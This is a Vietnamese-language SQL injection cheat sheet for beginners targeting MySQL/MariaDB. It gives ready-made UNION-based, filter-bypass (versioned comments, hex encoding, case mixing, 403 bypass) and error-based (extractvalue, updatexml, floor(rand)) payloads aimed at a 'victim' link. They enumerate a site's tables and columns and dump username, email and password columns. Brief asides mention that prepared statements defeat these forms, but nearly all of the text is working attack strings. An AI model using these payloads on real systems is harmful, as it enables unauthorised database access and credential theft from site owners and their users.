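Một số dạng SQLi (SQL injection) dành cho newbie. Các payload bên dưới dùng cú pháp MySQL/MariaDB (comment /*! ... */, group_concat, extractvalue, updatexml) và chỉ có tác dụng khi tham số đầu vào bị ghép thẳng vào câu truy vấn; truy vấn tham số hóa (prepared statement) loại bỏ toàn bộ các dạng này.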

------------------------------------ ***Dạng Basic "and=0":
**Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
Get table,column,data như bt thêm "and=0" sau id.
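***********Dạng /*!Union*/ /*!Select*/ (comment thực thi của MySQL: phần nằm trong /*! ... */ vẫn được MySQL thực thi, nên bộ lọc phải chuẩn hóa comment trước khi so khớp từ khóa) :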
**Tìm Order lỗi :link victim null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- - **Get database :link victim /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
**Get Colum:link victim /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x mã hex table-- -
**Get data :link victim /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- -
**********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn:
***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!tên cột,0x7c,tên cột,0x7c*/))),3 from table -- -
***************Dạng Bypass "=" chặn ẩn :
***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/ like database()-- -
***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/ like 0x...()-- -
***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000tên cột,0x7c,tên cột,0x7c*/))),4 from table-- -
********************Dạng Bypass 403 limit ***(Khó)
Order lỗi :id=-1' /*!50000union select*/ 1,2,3,4 -- -
Get table:id=-1' /*!50000union select*/ 1,2,3,concat_ws(0x7c,table_name) from information_schema.tables where table_schema=database() limit 1,1-- - ( Để biết thêm table tăng limit lên 1,1-2,1-3,1...)
Get column:id=-1' /*!50000union select*/ 1,2,3,concat_ws(0x7c,column_name) from information_schema.columns where table_name=0x... limit 1,1-- -(Tăng limit)
Get data :id=-1' /*!50000union select*/ 1,2,3,concat_ws(0x7c,tên cột,tên cột) from tên table -- -
----------------------------------Bypass 403 limit ****(cực kì khó)*****
***Tìm order lỗi :id=-1 /*!50000union select*/ 1,2,3-- -
***Get table:id=-1 /*!50000union select*/ 1,2,unhex(hex(concat_ws/*!(0x7c,table_name))) from /*!information_schema*/.tables where table_schema=database() limit 0,1-- -
***Get column:id=-1 /*!50000union select*/ 1,2,unhex(hex(concat_ws/*!(0x7c,column_name))) from /*!information_schema*/.columns where table_name=0x... limit 0,1-- -
***Get data:id=-1 /*!50000union select*/ 1,2,unhex(hex(concat_ws/*!(0x7c,tên cột,tên cột))*/) from tên table-- -
****Bypass Filter khó (1 order or nhiều order ) :
***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
Get Data:id=-1 Union Select group_concat(tên cột,0x7c,tên cột,0x7c) FrOm tên table-- -
Dạng id=-1 order by ....-- - không tìm được Order lỗi thì Biến đổi thành id=1' order by
- rồi khai thác Bt.
~~~>K Get dk table thì id=-1' .... rồi khai thác BT.
***************Dạng Table ẩn (UnIoN SeLeCT):
**Order lỗi : id=-... UNION SELECT 1,2,3,...-- -
**Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ).
**Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Thêm unhex(hex nếu table dạng ẩn )
**Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x mã hex table-- -
**Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên cột,0x7c,tên cột,0x7c,tên cột))),4,5,6,7,8,9,10,11,12,13 from tên table-- -
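****************XPath Injection (error-based) — thực chất là SQL injection error-based dựa vào thông báo lỗi XPath của hàm extractvalue(), không phải XPath injection vào truy vấn XML :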
1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
***Dạng Bypass Xpath( Khó )
1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- - 2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
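*****************XPath Injection (error-based, cao cấp) — mục 1 dựa vào lỗi trùng khóa của group by + floor(rand(0)*2), mục 2–4 dựa vào lỗi XPath của updatexml() :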
1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- -
2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from tên table limit 0,1)),0)-- -
Khai thác SQL = Error-based
Khai thác SQL Blind :
SQLi ở form search (tùy site) — các payload dưới đây là dạng UNION có hiển thị kết quả trên trang, không phải blind:
'and p.published =-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=0x62635f7573657273-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(username,0x2f,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from bc_users-- -

